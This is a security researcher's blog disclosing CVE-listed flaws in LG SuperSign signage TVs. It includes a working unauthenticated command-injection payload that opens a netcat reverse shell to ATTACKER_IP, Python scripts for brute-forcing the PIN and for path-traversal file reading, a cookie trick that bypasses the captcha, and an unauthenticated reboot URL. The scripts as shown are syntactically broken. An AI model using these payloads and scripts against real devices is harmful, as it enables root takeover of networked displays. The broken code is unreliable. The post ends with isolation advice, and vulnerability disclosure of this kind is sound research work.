miércoles, 19 de septiembre de 2018

LG SuperSign RCE! (to the 'luna' and back to shell)

Publishing the previous vulnerabilities in LG SuperSign TVs left me a bad taste in my mouth. Something like "I know that there must be something more".  So, I continued with my research and finally found the precious RCE.

This vulnerability has been addressed with the following CVE-2018-17173

The vuln

Playing with the app through burp I saw a url with some parameters. These URL is requested when the application needs to load the thumbnails of the images the user has uploaded.

So, I started to fuzz these parameters with ZAP until I found something interesting:

The application responded with the help screen of some utility called luna-send when the parameter sourceUri received the values "' or 1 --'". It looked like it was triggering a command that was calling this utility but failling due to an unexpected parameter. Cleaning a little bit the input I found that with the value ' -' it was enough to receive this response. I knew I was close.

If you see something like that in the response you immediately start to play with things like ;command, ;command;, etc, etc. After some failed attemps I tried with ' -;reboot;' and I saw how the TV was rebooting...the RCE was knocking on my door.

Getting a Shell

Taking advantage of the LFI, I knew that the TV had a netcat but was the netcat version  that doesn't support the -e option (downloading the binary), so I used the alternative:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f

Encoded all to be passed in the URL


So, the payload was ready:

' -;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i

Putting it all together:


I launched netcat to catch the shell, made the request and...


I was in.

In a few days I'll be updating this post with more technical details. 
That is all for now.

Points to take into account:

-No need to be authenticated
-No need to privilege escalation (app is running as root)

jueves, 13 de septiembre de 2018

Multiple vulnerabilities in LG SuperSignEZ CMS

Hello there, it´s been a long time.

Lately, I´ve been playing with LG SuperSign TVs and found some vulnerabilites.

These vulnerabilities have been addressed with the following CVE's

Weak authentication (bypass captcha + 4 digit PIN) CVE-2018-16286
Arbitrary FIle Upload CVE-2018-16287
LFI CVE-2018-16288
DoS via reboot command CVE-2018-16706

As we can see in the link above, LG SuperSign TVs are..

"*An industry definitive, software-based content management solution 
  *All-in-one solution for editing, scheduling, and distribution
  *Suitable for large-scale displays operation. Seamless management of different content for different displays"

These TVs are used in companies and stores for advertising.

The displayed content can be managed  from a CMS that these TVs have built-in, called SuperSign EZ. It offers a web interface running on port 9080 (Using a Node.js Express Framework):

First vuln, weak authentication

In the screenshot above, we have a login form with two fields, PIN and captcha. Hmmm...We don't know the min and max length of the PIN number and we can't bruteforce it because the presence of the captcha. But....Once I had access to the administration page (In this case the CMS had the default PIN 0000) I found two interesting things.

1_ There is a cookie that takes the name and value captcha:pass

2_ The PIN number, has a max of 4 digits (I verified that in the "Change PIN number" section)

So, I logged out, and using a cookie editor, added a cookie with the name "captcha" and the value "pass" and guess what...

The captcha was gone!

So....We have a 4 digit PIN number and no captcha to resolve...It's time to script our way in!

Analizing the response after a successful login we receive the message:

If we enter a wrong password we get:

So, we can code something like this:

import requests
import re
from argparse import ArgumentParser

parser = ArgumentParser(description="SuperSign BruteForce Script")
parser.add_argument("-t", "--target", dest="target",
parser.add_argument("-p", "--pass", dest="password",

args = parser.parse_args()

print "===================================="
print "=    SuperSign BruteForce Script                                          ="
print "===================================="

f = open(args.password, 'r')  #Opening password file (or you can just use while starting from 0000 to 9999)
for line in f:

data = {
        'password':str(line).replace('\n', ''),

print '[+]Trying with PIN:',str(line)

s = requests.post('http://'+ str(args.target).replace('\n', '') +'/', data=data)
matches = re.findall('success', s.text);

if len(matches) == 0:
    print 'Access Denied'
    print 'Success!'

The code is very simple. We make a request, using the cookie captcha:pass, for every value in 0000-9999 range and wait for the right response.

Bingo, we are in.

Second vuln, Local File Inclusion

Once I was in, using again my friend burp, I analized the requests that the application make when the user wants to add a new template and found that some files are called in this URL:


uploaded_file.ext is the file included in the template.

So, I started to try for LFI in some paths, and after receive the message "Not found" over and over, I received this beautiful response in this path:


This is so critical, because, this TV's can be connected with any other device of the company/store:

An attacker can obtain sensitive information for further attacks.

If you are thinking, An attacker needs to know the first vulnerability to gain access and later use the second one to get those files. Well, you are wrong. There is no need to be authenticated to exploit this LFI. If you take a look at the picture again, you can see that there is no cookie, so I'm not logged in.

Here is the code in python to retrieve any file you want:

import requests
import re
from argparse import ArgumentParser

parser = ArgumentParser(description="SuperSign Reboot")
parser.add_argument("-t", "--target", dest="target",
parser.add_argument("-p", "--path", dest="filepath",
                        help="path to the file you want to read")

args = parser.parse_args()
path = args.filepath

s = requests.get('http://'+ str(args.target).replace('\n', '') +'/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'+str(path))
print s.text

Third vuln, Arbitrary file upload

Obviously, if you can serve content, you've got a File Upload function. The problem is that there is no control about the file type a user can upload, so we can upload any kind of files.

Then, we can access the uploaded file using the LFI vulnerability (to get an XSS in this case):

With this in mind, an attacker can access to the manager, upload a malicious file and send the link to the victim.

Hey wait, there's one more..

Fourth vuln, DoS via reboot function

Triggering an error, I found some interesting files that I could read via the LFI. One of those file had the code to a reboot function:

So...making a request to the URL http://SuperSign_IP:9080/qsr_server/device/reboot it is possible to reboot the device without authentication.

Well, I guess that's all for the moment.


At the moment, the only thing you can do to mitigate this vulnerabilities is isolate this devices. You must restrict the access to this TVs in your internal network and please, please, please, DO NOT EXPOSE THEM TO THE INTERNET!!!!